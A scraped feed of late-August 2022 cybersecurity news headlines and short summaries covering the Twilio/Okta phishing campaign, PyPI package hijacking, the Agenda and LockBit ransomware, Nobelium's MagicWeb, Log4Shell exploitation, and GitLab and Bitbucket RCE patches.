                Autosummary: The information that could be harvested by Facebook apps, according to Bright, was extensive and included “about me, actions, activities, b-day, check-ins, education, events, games, groups, hometown, interests, likes, location, notes, online status, tags, photos, questions, relationships, religion/politics, status, subscriptions, website, work history.” "


                FBI: Hackers increasingly exploit DeFi bugs to steal cryptocurrency

                exploits
                2022-08-29 https://www.bleepingcomputer.com/news/security/fbi-hackers-increasingly-exploit-defi-bugs-to-steal-cryptocurrency/
                The U.S. Federal Bureau of Investigation (FBI) is warning investors that cyber criminals are increasingly exploiting security vulnerabilities in Decentralized Finance (DeFi) platforms to steal cryptocurrency. [...] "

                Autosummary: Overview of cryptocurrency theft (Chainalysis). In April, the FBI linked the hack of Axie Infinity's Ronin network bridge, now the largest crypto hack ever, to the Lazarus and BlueNorOff (aka APT38) North Korean threat groups. "


                Leading library services firm Baker & Taylor hit by ransomware

                exploits ransomware
                2022-08-29 https://www.bleepingcomputer.com/news/security/leading-library-services-firm-baker-and-taylor-hit-by-ransomware/
                Baker & Taylor, which describes itself as the world's largest distributor of books to libraries worldwide, today confirmed it's still working on restoring systems after being hit by ransomware more than a week ago. [...] "

                Autosummary: "


                Windows malware delays coinminer install by a month to evade detection

                exploits
                2022-08-29 https://www.bleepingcomputer.com/news/security/windows-malware-delays-coinminer-install-by-a-month-to-evade-detection/
                A new malware campaign disguised as Google Translate or MP3 downloader programs was found distributing cryptocurrency mining malware across 11 countries. [...] "

                Autosummary: Firewall rule to exempt malware communications from scrutiny (Check Point). Now that the device has been prepped for the final payload, the program loads the last dropper, which fetches another RAR file containing the XMRig mining malware, its controller, and a ".sys" file that has its settings. "


                New Golang-based "Agenda Ransomware" Can Be Customized For Each Victim

                exploits ransomware
                2022-08-29 https://thehackernews.com/2022/08/new-golang-based-agenda-ransomware-can.html
                A new ransomware strain written in Golang dubbed "Agenda" has been spotted in the wild, targeting healthcare and education entities in Indonesia, Saudi Arabia, South Africa, and Thailand. "Agenda can reboot systems in safe mode, attempts to stop many server-specific processes and services, and has multiple modes to run," Trend Micro researchers said in an analysis last week. Qilin, the threat "

                Autosummary: "


                Twilio data breach turns out to be more elaborate than suspected

                financial
                2022-08-29 https://www.malwarebytes.com/blog/news/2022/08/twilio-data-breach-turns-out-to-be-more-elaborate-than-suspected

                Categories: News

                Tags: twilio

                Tags: okta

                Tags: Authy

                Tags: Signal

                Tags: Cloudflare

                Tags: MailChimp

                Tags: Klaviyo

                Tags: scatter swine

                Tags: oktapus

                Tags: 2fa

                Tags: otp

                Even if you don't know a thing about Twilio, you may have been affected by their data breach.


                The post Twilio data breach turns out to be more elaborate than suspected appeared first on Malwarebytes Labs.

                "

                Autosummary: In a first update, Twilio, a cloud-based communication platform provider, revealed that the attackers also compromised the accounts of some users of Authy, its two-factor authentication (2FA) app. "


                New Agenda Ransomware appears in the threat landscape

                exploits ransomware
                2022-08-28 https://securityaffairs.co/wordpress/134911/cyber-crime/agenda-ransomware.html

                Trend Micro researchers warn of a new ransomware family called Agenda, which has been used in attacks on organizations in Asia and Africa. Trend Micro researchers recently discovered a new piece of targeted ransomware, tracked as Agenda, that was written in the Go programming language. The ransomware was employed in a targeted attack against one of […]

                The post New Agenda Ransomware appears in the threat landscape appeared first on Security Affairs.

                "

                Autosummary: Agenda reboots the victim’s machine in safe mode and then encrypts files upon reboot, a technique adopted by other ransomware gangs such as REvil. The threat actor gained access via RDP to Active Directory using leaked accounts, then used the scanning tools Nmap.exe and Nping.exe to scan the network. "


                Week in review: RCE bug in GitLab patched, phishing PyPI users, Escanor malware in MS Office docs

                financial exploits
                2022-08-28 https://www.helpnetsecurity.com/2022/08/28/week-in-review-rce-bug-in-gitlab-patched-phishing-pypi-users-escanor-malware-in-ms-office-docs/

                Thoma Bravo: Securing digital identities has become a major priority In this Help Net Security interview, Andrew Almeida, Partner on the Flagship team at Thoma Bravo, talks about the firm’s recent acquisition of SailPoint, and about innovation in the enterprise identity space. Critical RCE bug in GitLab patched, update ASAP! (CVE-2022-2884) GitLab has fixed a remote code execution vulnerability (CVE-2022-2884) affecting the Community and the Enterprise Edition of its DevOps platform, and has urged admins … More

                The post Week in review: RCE bug in GitLab patched, phishing PyPI users, Escanor malware in MS Office docs appeared first on Help Net Security.

                "

                Autosummary: What businesses can do to anticipate and mitigate ransomware threats In this Help Net Security video, Kevin Holvoet, Cyber Threat Intelligence Instructor, SANS Institute, discusses ransomware and Ransomware as a Service (RaaS) attacks, and illustrates how preparedness with a proper top-down response is critical for business continuity in case of an attack. New infosec products of the week: August 26, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Drata, Ntrinsec, PlainID, Privitar, and ReasonLabs. "


                Experts warn of the first known phishing attack against PyPI

                financial
                2022-08-28 https://securityaffairs.co/wordpress/134931/cyber-crime/pypi-phishing-campaign.html

                The Python Package Index (PyPI) warns of an ongoing phishing campaign to steal developer credentials and distribute malicious updates. The Python Package Index, PyPI, this week warned of an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates to the packages in the repository. “Today we received reports of a phishing […]

                The post Experts warn of the first known phishing attack against PyPI appeared first on Security Affairs.

                "

                Autosummary: “The phishing attempt and the malicious packages are linked by the domain linkedopports[.]com, which appears in the malicious package code and also functions as the location to which the phishing site tries to send the stolen credentials.” reads the analysis published by Checkmarx. "


                LockBit ransomware gang gets aggressive with triple-extortion tactic

                exploits ransomware
                2022-08-28 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/
                LockBit ransomware gang announced that it is improving defenses against distributed denial-of-service (DDoS) attacks and working to take the operation to triple extortion level. [...] "

                Autosummary: LockBit getting into DDoS Earlier this week, LockBitSupp, the public-facing figure of the LockBit ransomware operation, announced that the group is back in business with a larger infrastructure to give access to leaks unfazed by DDoS attacks. "


                Surveillance firm’s leaked docs show the purchase of an $8M iOS RCE zero-day exploit

                exploits
                2022-08-28 https://securityaffairs.co/wordpress/134962/malware/surveillance-firm-intellexa-offer.html

                Leaked documents show the surveillance firm Intellexa offering exploits for iOS and Android devices for $8 Million. Intellexa is an Israeli surveillance firm founded by Israeli entrepreneur Tal Dilian; it offers surveillance and hacking solutions to law enforcement and intelligence agencies. The vx-underground researchers shared some images of several confidential documents that appear to be […]

                The post Surveillance firm’s leaked docs show the purchase of an $8M iOS RCE zero-day exploit appeared first on Security Affairs.

                "

                Autosummary: "Leaked documents online show the purchase (and documentation of) an $8,000,000 iOS Remote Code Execution 0day exploit pic.twitter.com/lhmc8QdfGv" — vx-underground (@vxunderground) August 24, 2022. The leaked documentation demonstrates that the company offers services for remote data extraction from Android and iOS devices. "


                Okta one-time MFA passcodes exposed in Twilio cyberattack

                ciber
                2022-08-28 https://www.bleepingcomputer.com/news/security/okta-one-time-mfa-passcodes-exposed-in-twilio-cyberattack/
The threat actor behind the Twilio hack used their access to steal one-time passwords (OTPs) delivered over SMS to customers of the identity and access management company Okta. [...] "

Autosummary: Additionally, Okta advises the following: use Network Zones to deny or perform step-up authentication on requests from rarely-used networks and anonymizing proxies; restrict access to applications to only registered devices or devices managed by endpoint management tools; restrict access to the most sensitive applications and data using application-specific authentication policies. For customers that want to look for Scatter Swine SMS events (e.g. authentication challenges, password resets or factor enrollment events), Okta has provided a system log query that reveals new devices and network locations for a particular user. "


                Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations

                exploits
                2022-08-27 https://thehackernews.com/2022/08/iranian-hackers-exploiting-unpatched.html
                Iranian state-sponsored actors are leaving no stone unturned to exploit unpatched systems running Log4j to target Israeli entities, indicating the vulnerability’s long tail for remediation. Microsoft attributed the latest set of activities to the umbrella threat group tracked as MuddyWater (aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is linked to the Iranian intelligence "


                Unprecedented cyber attack hit State Infrastructure of Montenegro

                government
                2022-08-27 https://securityaffairs.co/wordpress/134900/cyber-warfare-2/montenegro-cyber-attack.html

The state infrastructure of Montenegro was hit by a massive and “unprecedented” cyber attack, authorities announced. An unprecedented cyber attack hit the government digital infrastructure in Montenegro; the government promptly adopted measures to mitigate its impact. Montenegro immediately reported the attack to other members of the NATO alliance. “Certain services were switched off temporarily […]

                The post Unprecedented cyber attack hit State Infrastructure of Montenegro appeared first on Security Affairs.


                Fake "Cthulhu World" P2E project used to push info-stealing malware

                exploits
                2022-08-27 https://www.bleepingcomputer.com/news/security/fake-cthulhu-world-p2e-project-used-to-push-info-stealing-malware/
                Hackers have created a fake "Cthulhu World" play-to-earn community, including websites, Discord groups, social accounts, and a Medium developer site, to distribute the Raccoon Stealer, AsyncRAT, and RedLine password-stealing malware infections on unsuspecting victims. [...] "

                Autosummary: Hackers have created a fake "Cthulhu World" play-to-earn community, including websites, Discord groups, social accounts, and a Medium developer site, to distribute the Raccoon Stealer, AsyncRAT, and RedLine password-stealing malware infections on unsuspecting victims. "


                Alteryx Server-FIPS enables users to scale analytics initiatives across public sector agencies

                industry
                2022-08-26 https://www.helpnetsecurity.com/2022/08/26/alteryx-server-fips/

                Alteryx announced Alteryx Server-FIPS, a version of its Server offering that is aligned with the Federal Information Processing Standards (FIPS) for data security and computer systems. The launch of Server-FIPS is monumental for the use of analytics in public sector environments that require enhanced data encryption. Alteryx Server-FIPS is a FIPS-capable and scalable server-based product for scheduling, sharing, and running apps and models created in Alteryx Designer-FIPS for others in the organization to leverage. This … More

                The post Alteryx Server-FIPS enables users to scale analytics initiatives across public sector agencies appeared first on Help Net Security.


                How fast is the financial industry fixing its software security flaws?

                financial industry
                2022-08-26 https://www.helpnetsecurity.com/2022/08/26/financial-software-security-flaws/

                Veracode released data revealing that the financial services industry ranks among the best for overall flaw percentage when compared to other industries, but has one of the lowest fix rates for software security flaws. The sector also falls to the middle of the pack for high-severity flaws, with 18 percent of applications containing a serious vulnerability, suggesting financial firms should prioritize identifying and remediating the flaws that matter most. The findings were outlined in the … More

                The post How fast is the financial industry fixing its software security flaws? appeared first on Help Net Security.

                Autosummary: Although the finance sector outperforms most other industries in fix times for flaws discovered by dynamic, SCA, and static, the study found there is still ample room for continued improvement when looking at the number of days it takes to resolve 50 percent of flaws—116 days for dynamic analysis, 385 days for SCA, and 288 days for static analysis. "


                0ktapus phishing campaign: Twilio hackers targeted other 136 organizations

                financial
                2022-08-26 https://securityaffairs.co/wordpress/134851/hacking/0ktapus-phishing-campaign.html

The threat actors behind the Twilio and Cloudflare attacks have been linked to a phishing campaign that targeted 136 other organizations. The threat actors behind the attacks on Twilio and Cloudflare have been linked to a large-scale phishing campaign that targeted 136 organizations, security firm Group-IB reported. Most of the victims are organizations providing IT, software development, and cloud services. The campaign, codenamed 0ktapus, […]

                The post 0ktapus phishing campaign: Twilio hackers targeted other 136 organizations appeared first on Security Affairs.


                Microsoft: Iranian hackers still exploiting Log4j bugs against Israel

                exploits
                2022-08-26 https://www.bleepingcomputer.com/news/security/microsoft-iranian-hackers-still-exploiting-log4j-bugs-against-israel/
                Hackers continue to exploit the Log4j vulnerability in vulnerable applications, as shown by the Iranian "MuddyWater" threat actor who was found targeting Israeli organizations using the SysAid software. [...] "

                Autosummary: SysAid is an excellent initial access vector in that sense, as it still incorporates Log4j, and numerous organizations use it as an IT management tool, service desk, and help desk solution. "


                Ransomware Attacks are on the Rise

                exploits
                2022-08-26 https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
                Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group. "

                Autosummary: “It is likely that the threat actors that were undergoing structural changes,” the authors of the report speculated, “and have begun settling into their new modes of operating, resulting in their total compromises increasing in conjunction.” "


                French hospital crippled by cyberattack – Week in security with Tony Anscombe

                ciber
                2022-08-26 https://www.welivesecurity.com/videos/french-hospital-cyberattack-week-security-tony-anscombe/

                As another hospital falls victim to ransomware, Tony weighs in on the much-debated issue of banning ransomware payouts

                The post French hospital crippled by cyberattack – Week in security with Tony Anscombe appeared first on WeLiveSecurity


                Iran-linked Mercury APT exploited Log4Shell in SysAid Apps for initial access

                exploits
                2022-08-26 https://securityaffairs.co/wordpress/134876/apt/mercury-exploit-log4shell-flaw.html

An Iran-linked Mercury APT group exploited the Log4Shell vulnerability in SysAid applications for initial access to the targeted organizations. The Log4Shell flaw (CVE-2021-44228) made the headlines in December after Chinese security researcher p0rz9 publicly disclosed a proof-of-concept exploit for the critical remote code execution zero-day vulnerability that affects the Apache Log4j Java-based logging library. The flaw can be exploited […]

                The post Iran-linked Mercury APT exploited Log4Shell in SysAid Apps for initial access appeared first on Security Affairs.

                Autosummary: The threat actor used different methods to communicate with their C2 server, including built-in operating system tools such as PowerShell, a tunneling tool called vpnui.exe, a unique version of the open-source tool Ligolo, and a remote monitoring and management software called eHorus. "


                The Week in Ransomware - August 26th 2022 - Fighting back

                exploits ransomware
                2022-08-26 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-26th-2022-fighting-back/
                We saw a bit of ransomware drama this week, mostly centered around LockBit, who saw their data leak sites taken down by a DDoS attack after they started leaking the allegedly stolen Entrust data. [...] "

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @VK_Intel, @LawrenceAbrams, @jorntvdw, @billtoulas, @demonslay335, @PolarToffee, @Ionut_Ilascu, @Seifreed, @fwosar, @DanielGallagher, @struppigel, @BleepinComputer, @malwareforme, @serghei, @FourOctets, @malwrhunterteam, @TrendMicro, @GossiTheDog, @AlvieriD, @ValeryMarchive, @Cyberknow20, @VenezuelaBTH, @S0ufi4n3, @vxunderground, @AShukuhi, @pcrisk, and @ddd1ms. According to our information, the investigators in charge of the cyberattack that led to the outbreak of the LockBit ransomware, last weekend, at the Sud-Francilien hospital center (CHSF), in Corbeil-Essonnes, currently suspect that the hijacking of a publisher's support account served as the initial intrusion vector. "


                DoorDash discloses new data breach tied to Twilio hackers

                financial
                2022-08-26 https://www.bleepingcomputer.com/news/security/doordash-discloses-new-data-breach-tied-to-twilio-hackers/
                Food delivery firm DoorDash has disclosed a data breach exposing customer and employee data that is linked to the recent cyberattack on Twilio. [...] "

                Autosummary: Other companies targeted in the attack include Coinbase, KuCoin, Binance, Microsoft, Telus, Verizon Wireless, T-Mobile, AT&T, Sprint, Rogers, Mailgun, Slack, Box, SendGrid, Yahoo, Sykes, BestBuy, and Infosys. "


                Atlassian Bitbucket Server vulnerable to critical RCE vulnerability

                exploits
                2022-08-26 https://www.bleepingcomputer.com/news/security/atlassian-bitbucket-server-vulnerable-to-critical-rce-vulnerability/
                Atlassian has published a security advisory warning Bitbucket Server and Data Center users of a critical security flaw that attackers could leverage to execute arbitrary code on vulnerable instances. [...] "

                Autosummary: The versions that address the problem are 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2, and 8.3.1. "


                Critical Vulnerability Discovered in Atlassian Bitbucket Server and Data Center

                exploits
                2022-08-26 https://thehackernews.com/2022/08/critical-vulnerability-discovered-in.html
                Atlassian has rolled out fixes for a critical security flaw in Bitbucket Server and Data Center that could lead to the execution of malicious code on vulnerable installations. Tracked as CVE-2022-36804 (CVSS score: 9.9), the issue has been characterized as a command injection vulnerability in multiple endpoints that could be exploited via specially crafted HTTP requests. “An "


                Avast Ransomware Shield for businesses prevents unauthorised access

                exploits ransomware
                2022-08-25 https://www.helpnetsecurity.com/2022/08/25/avast-ransomware-shield/

                Avast has launched a Ransomware Shield for businesses, offering organizations an extra layer of protection against ransomware attacks. This will ensure businesses can secure their files and customer data, with proactive protection which prevents unauthorized access. The new feature is available as part of the Avast Essential, Premium, and Ultimate Business Security packages for businesses for both Windows and MacOS. Despite observing a decline in ransomware attacks in Q4 2021 and Q1 2022, ransomware attacks … More

                The post Avast Ransomware Shield for businesses prevents unauthorised access appeared first on Help Net Security.


                We need to think about ransomware differently

                exploits ransomware
                2022-08-25 https://www.helpnetsecurity.com/2022/08/25/think-about-ransomware-differently-video/

                In this Help Net Security video, David Mahdi, Chief Strategy Officer & CISO Advisory at Sectigo, talks about how ransomware isn’t solely a malware problem, bad actors want access to your data, so it really is a data security and access problem. When we look at what ransomware does, it leverages users’ access within an organization to encrypt sensitive files (and often also steal). The authentication given to a user defines the level of damage … More

                The post We need to think about ransomware differently appeared first on Help Net Security.


                Ransomware dominates the threat landscape

                exploits
                2022-08-25 https://www.helpnetsecurity.com/2022/08/25/ransomware-dominates-threat-landscape/

                Acronis researchers have concluded that ransomware continues to be the number one threat to large and medium-sized businesses, including government organizations. Nearly half of all reported breaches during the first half of 2022 involved stolen credentials, which enable phishing and ransomware campaigns. Findings underscore the need for more holistic approaches to cybersecurity. To extract credentials and other sensitive information, cybercriminals use phishing and malicious emails as their preferred infection vectors. Nearly one percent of all … More

                The post Ransomware dominates the threat landscape appeared first on Help Net Security.

Autosummary: The current cybersecurity threat landscape requires a multi-layered solution that combines anti-malware, EDR, DLP, email security, vulnerability assessment, patch management, RMM, and backup capabilities all in one place. The business world is increasingly distributed, and in Q2 2022, an average of 8.3% of endpoints tried to access malicious URLs. "


                Organizations changing cyber strategy in response to nation-state attacks

                government
                2022-08-25 https://www.helpnetsecurity.com/2022/08/25/changing-cyber-strategy-nation-state-attacks/

66% of organizations have changed their cybersecurity strategy as a direct response to the conflict between Russia and Ukraine, while 64% suspect their organization has been either directly targeted or impacted by a nation-state cyber attack, according to Venafi. Other key findings include: 77% believe we’re in a perpetual state of cyberwar; 82% believe geopolitics and cybersecurity are intrinsically linked; more than two-thirds (68%) have had more conversations with their board and senior management in … More

                The post Organizations changing cyber strategy in response to nation-state attacks appeared first on Help Net Security.

Autosummary: Other key findings include: 77% believe we’re in a perpetual state of cyberwar; 82% believe geopolitics and cybersecurity are intrinsically linked; more than two-thirds (68%) have had more conversations with their board and senior management in response to the Russia/Ukraine conflict; 63% doubt they’d ever know if their organization was hacked by a nation-state; 64% think the threat of physical war is a greater concern in their country than cyberwar. “Cyberwar is here. "


                PyPI Repository Warns Python Project Maintainers About Ongoing Phishing Attacks

                financial
                2022-08-25 https://thehackernews.com/2022/08/pypi-repository-warns-python-project.html
                The Python Package Index, PyPI, on Wednesday sounded the alarm about an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates to legitimate packages. "This is the first known phishing attack against PyPI," the maintainers of the official third-party software repository said in a series of tweets. The social engineering attack entails sending "

                Autosummary: "This malware is untypically large, ~63MB, (possibly in an attempt to evade [antivirus] detection) and has a valid signature (signed on August 23rd, 2022)," Checkmarx researcher Aviad Gershon noted. "


                Phishing PyPI users: Attackers compromise legitimate projects to push malware

                financial exploits
                2022-08-25 https://www.helpnetsecurity.com/2022/08/25/pypi-phishing/

                PyPI, the official third-party software repository for Python packages, is warning about a phishing campaign targeting its users. “We have additionally determined that some maintainers of legitimate projects have been compromised, and malware published as the latest release for those projects. These releases have been removed from PyPI and the maintainer accounts have been temporarily frozen,” the PyPI team noted. The malicious releases that they are currently aware of are: exotel – v0.1.6 spam – … More

                The post Phishing PyPI users: Attackers compromise legitimate projects to push malware appeared first on Help Net Security.

                Autosummary: PyPI (i.e., the Python Software Foundation, which runs the repository) has recently begun requiring that maintainers of critical projects/packages must have 2FA enabled to publish, update, or modify them, and has distributed 4000 hardware security keys to help them. "


                Twilio hackers also breached over 130 orgs in massive phishing attack

                financial
                2022-08-25 https://www.bleepingcomputer.com/news/security/twilio-hackers-also-breached-over-130-orgs-in-massive-phishing-attack/
                Threat analysts have discovered the phishing kit responsible for thousands of attacks against 136 high-profile organizations that have compromised 9,931 accounts. [...] "

                Autosummary: Some of the targeted companies include T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, AT&T, HubSpot, TTEC, and Best Buy. "


                PyPI packages hijacked after developers fall for phishing emails

                financial
                2022-08-25 https://www.bleepingcomputer.com/news/security/pypi-packages-hijacked-after-developers-fall-for-phishing-emails/
A phishing campaign caught yesterday was seen targeting maintainers of Python packages published to the PyPI registry. Python packages "exotel" and "spam" are among hundreds seen laced with malware after attackers successfully compromised accounts of maintainers who fell for the phishing email. [...] "

Autosummary: Along with this, the registry admins shared a number of steps one could take to safeguard themselves from such phishing attacks, such as checking the URL of the page before providing their PyPI account credentials: To verify that you’re not entering credentials in a phishing site, confirm that the URL in the address bar is https://t.co/diAe0xWm0R and that the site’s TLS certificate is issued to https://t.co/diAe0xWm0R. Additionally, consider using a browser-integrated password manager. "


                Microsoft Uncovers New Post-Compromise Malware Used by Nobelium Hackers

                exploits
                2022-08-25 https://thehackernews.com/2022/08/microsoft-uncovers-new-post-compromise.html
The threat actor behind the SolarWinds supply chain attack has been linked to yet another "highly targeted" post-exploitation malware that could be used to maintain persistent access to compromised environments. Dubbed MagicWeb by Microsoft's threat intelligence teams, the development reiterates Nobelium's commitment to developing and maintaining purpose-built capabilities. Nobelium is the tech "


                U.S. Government Spending Billions on Cybersecurity

                government ciber
                2022-08-25 https://thehackernews.com/2022/08/us-government-spending-billions-on.html
                In recent months, the House of Representatives has been hard at work drafting various spending bills for the 2023 fiscal year. While these bills provide funding for a vast array of government programs and agencies, there was one thing that really stands out. Collectively, the bills that are making their way through the house allocate a staggering $15.6 billion to cybersecurity spending. As you "

Autosummary: With billions of dollars in government spending being poured into the security industry, we will almost certainly see security products and cloud services eventually take an exponential leap forward as a direct result of being able to invest more heavily in product development and security research. Beef up your own cybersecurity initiatives, without the price tag: CISA offers numerous recommendations for how organizations can improve their overall cybersecurity, but many of these guidelines pertain to passwords. "


                Microsoft: Russian malware hijacks ADFS to log in as anyone in Windows

                exploits
                2022-08-25 https://www.bleepingcomputer.com/news/security/microsoft-russian-malware-hijacks-adfs-to-log-in-as-anyone-in-windows/
                Microsoft has discovered a new malware used by the Russian hacker group APT29 (a.k.a. NOBELIUM, Cozy Bear) that enables authentication as anyone in a compromised network. [...] "

                Autosummary: Dubbed ‘MagicWeb’, the new malicious tool is an evolution of ‘FoggyWeb’, which allowed hackers to exfiltrate the configuration database of compromised Active Directory Federation Services (ADFS) servers, decrypt token-signing and token-decryption certificates, and fetch additional payloads from the command and control (C2) server. "


                Twilio hackers hit over 130 orgs in massive Okta phishing attack

                financial
                2022-08-25 https://www.bleepingcomputer.com/news/security/twilio-hackers-hit-over-130-orgs-in-massive-okta-phishing-attack/
                Threat analysts have discovered the phishing kit responsible for thousands of attacks against 136 high-profile organizations that have compromised 9,931 accounts. [...] "

                Autosummary: Some of the targeted companies include T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, AT&T, HubSpot, TTEC, and Best Buy. "


                Cybercriminals Are Selling Access to Chinese Surveillance Cameras

                ciber
                2022-08-25 https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/
                Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed. "

                Autosummary: In the time since, the researchers have discovered “multiple instances of hackers looking to collaborate on exploiting Hikvision cameras using the command injection vulnerability,” specifically in Russian dark web forums, where leaked credentials have been put up for sale. "


                Nobelium APT uses new Post-Compromise malware MagicWeb

                exploits
                2022-08-25 https://securityaffairs.co/wordpress/134838/apt/nobelium-magicweb-tool.html

                Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked NOBELIUM APT group to maintain persistent access to compromised environments.  The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that […]

                The post Nobelium APT uses new Post-Compromise malware MagicWeb appeared first on Security Affairs.

                Autosummary: The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that conducted the supply chain attack against SolarWinds, which involved multiple families of implants, including the SUNBURST backdoor, TEARDROP malware, GoldMax malware, Sibot, and GoldFinder backdoors. "


                How "Kimsuky" hackers ensure their malware only reach valid targets

                exploits
                2022-08-25 https://www.bleepingcomputer.com/news/security/how-kimsuky-hackers-ensure-their-malware-only-reach-valid-targets/
                The North Korean "Kimsuky" threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers. [...] "

                Autosummary: Its function is to profile the victim by checking ProgramFiles folder paths, AV name, username, OS version, MS Office version, .NET framework version, and more. "


                Exploits and TrickBot disrupt manufacturing operations

                exploits industry
                2022-08-25 https://www.malwarebytes.com/blog/threat-intelligence/2022/08/exploits-and-trickbot-disrupt-manufacturing-operations

                Categories: Threat Intelligence

                September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri. This is combined with heavy detections of unseen malware, identified through our AI engine, spiking in May as well as September 2021.

                (Read more...)

                The post Exploits and TrickBot disrupt manufacturing operations appeared first on Malwarebytes Labs.

Autosummary: Posted: August 25, 2022 by September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri. For example, the video card maker NVIDIA dealt with a significant attack in February 2022; March saw the infection of the tool manufacturer Snap-On Tools by Conti ransomware; in April there was an operation against General Motors; and in May, infiltration of the agricultural company, AGCO. "


                Update now! GitLab issues critical security release for RCE vulnerability

                exploits
                2022-08-25 https://www.malwarebytes.com/blog/news/2022/08/update-now-gitlab-issues-critical-security-release-for-rce-vulnerability

Categories: Exploits and vulnerabilities, News

Tags: GitLab, RCE, CVE-2022-2884, GitHub, import

                GitLab has released important security fixes to patch for an RCE vulnerability, known as CVE-2022-2884.

                (Read more...)

                The post Update now! GitLab issues critical security release for RCE vulnerability appeared first on Malwarebytes Labs.

Autosummary: Disable GitHub import: log in to your GitLab installation using an administrator account and perform the following: click "Menu" -> "Admin". "


                A major European logistics company selects IronNet to improve its operational security

                industry
                2022-08-25 https://www.helpnetsecurity.com/2022/08/26/ironnet-european-logistics-company/

                IronNet announced that a major European logistics company, offering courier, package delivery and express mail service, will deploy the IronNet Collective DefenseSM platform to help defend against increased cyber threats facing the sector. The logistics company is remaining anonymous to help protect its operational security. It serves millions of customers across Europe, provides pick-up and drop-off points for package and parcel services as well as door-to-door courier and fulfillment services for e-merchants. “Cyber attacks along … More

                The post A major European logistics company selects IronNet to improve its operational security appeared first on Help Net Security.

                Autosummary: The security platform will enable the logistics company to leverage NDR capabilities, powered by behavioral analytics, to detect unknown threats on its network and, in turn, anonymously in real-time exchange visibility with others in the Collective Defense community. "


                LastPass data breach: threat actors stole a portion of source code

                financial
                2022-08-25 https://securityaffairs.co/wordpress/134858/data-breach/lastpass-data-breach.html

Password management software firm LastPass has suffered a data breach; threat actors stole source code and other data. Password management software firm LastPass disclosed a security breach: threat actors had access to portions of the company's development environment through a single compromised developer account and stole portions of source code and some proprietary technical […]

                The post LastPass data breach: threat actors stole a portion of source code appeared first on Security Affairs.


                Data Dynamics StorageX9.0 helps customers manage sprawls of unstructured data

                industry
                2022-08-24 https://www.helpnetsecurity.com/2022/08/24/data-dynamics-storagex9-0/

                Data Dynamics released StorageX9.0, expanding and enhancing the existing product functionalities to help customers manage sprawls of unstructured data and its complexities. It enables enterprises to categorize & analyze their data, draw actionable insights, apply security practices, maintain compliance, and enhance business performance. StorageX 9.0 is power packed with new features, including Share and DFS analytics, NFSv4 and NFSv3 POSIX security translation, and support for versioned object mobility. “StorageX 9.0 is an enhancement to our … More

                The post Data Dynamics StorageX9.0 helps customers manage sprawls of unstructured data appeared first on Help Net Security.

                "

                Autosummary: "


                Giant Oak GOST updates empower users to identify money laundering and other illicit activities

                financial
                2022-08-24 https://www.helpnetsecurity.com/2022/08/24/giant-oak-gost/

                Giant Oak has updated their GOST product. The Fall 2022 GOST Release introduces three primary updates: increase in precision of alerts; modular management of customized models; and expanded access to GOSTCrawl, a proprietary data source that increases the customer’s risk discovery. The new GOST updates reduce analyst labor by 50% while increasing the accuracy and agility of results. The combined improvements allow GOST users to monitor large populations more efficiently and effectively than other risk … More

                The post Giant Oak GOST updates empower users to identify money laundering and other illicit activities appeared first on Help Net Security.

                "

                Autosummary: "


                New social engineering tactics discovered in the wild

                industry
                2022-08-24 https://www.helpnetsecurity.com/2022/08/24/new-social-engineering-tactics-video/

                In this Help Net Security video, Otavio Freire, President and CTO at SafeGuard Cyber, offers insight on new social engineering tactics discovered in the wild, and illustrates how phishing attacks are changing, including how they’re evolving beyond email.

                The post New social engineering tactics discovered in the wild appeared first on Help Net Security.

                "

                Autosummary: "


                CISOs see little need for a point solution to cover ransomware risk

                exploits ransomware
                2022-08-24 https://www.helpnetsecurity.com/2022/08/24/point-solution-ransomware-video/

                Nearly half of enterprises have fallen victim to a ransomware attack, of which nearly all have had little choice but to heed their attackers, according to the Q2 CISO Circuit report from YL Ventures. The financial disruption, privacy implications and operational failure danger caused by ransomware are often too critical to suffer. This is especially true in cases involving critical infrastructure, including water treatment and hospital networks. For now, CISOs see little need for a … More

                The post CISOs see little need for a point solution to cover ransomware risk appeared first on Help Net Security.

                "

                Autosummary: "


                Critical RCE bug in GitLab patched, update ASAP! (CVE-2022-2884)

                exploits
                2022-08-24 https://www.helpnetsecurity.com/2022/08/24/cve-2022-2884/

                GitLab has fixed a remote code execution vulnerability (CVE-2022-2884) affecting the Community and the Enterprise Edition of its DevOps platform, and has urged admins to upgrade their GitLab instances immediately. The vulnerability was reported through the company’s bug bounty program and there is no mention of it being actively exploited in the wild. About CVE-2022-2884 CVE-2022-2884 is a critical severity issue that may allow an authenticated user to achieve remote code execution via the Import … More

                The post Critical RCE bug in GitLab patched, update ASAP! (CVE-2022-2884) appeared first on Help Net Security.

                "

                Autosummary: "


                France hospital Center Hospitalier Sud Francilien suffered ransomware attack

                exploits ransomware
                2022-08-24 https://securityaffairs.co/wordpress/134771/cyber-crime/center-hospitalier-sud-francilien-ransomware.html

